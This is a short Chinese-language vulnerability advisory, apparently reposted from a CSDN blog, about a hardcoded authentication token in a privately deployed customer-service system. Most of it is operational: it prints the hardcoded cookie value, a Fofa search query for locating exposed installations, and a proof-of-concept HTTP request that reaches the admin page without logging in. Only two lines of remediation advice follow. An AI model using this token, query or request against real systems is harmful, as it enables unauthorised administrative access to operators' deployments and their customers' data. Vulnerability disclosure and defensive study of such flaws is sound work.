54K55LyB5p2l5a6i5pyN57O757uf token硬编码漏洞
0x01 产品描述:
54K55LyB5p2l5a6i5pyN57O757uf是独立源码部署的客服系统,支持接入到小程序、公众号、网站、APP。私有化源码部署,数据可控,稳定可靠。可自定义版权、logo。支持网页、微信公众号、小程序、App等任何程序对接
0x02 漏洞描述:
54K55LyB5p2l5a6i5pyN57O757uf系统中存在一套token硬编码,可利用改token伪造系统登录从而绕过后端接口权限校验检查。
0x03 搜索语句:
Fofa:body="layui-form-item" && body="/admin/login/check.html"
0x04 漏洞复现:
硬编码数据如下:
Cookie:service_token=OuwfoovK%2BIdd
在cookie中写入上述数据后访问admin/custom/index.html进行主页跳转
poc验证
GET /admin/custom/index.html HTTP/1.1
Host: your-ip
Cookie: service_token=OuwfoovK%2BIdd
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
X-Requested-With: XMLHttpRequest
0x05 修复建议:
禁止系统中存放任何形式的硬编码数据。
通过增加ip白名单形式控制外部访问权限。
原文地址:https://blog.csdn.net/xc_214/article/details/142614536
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!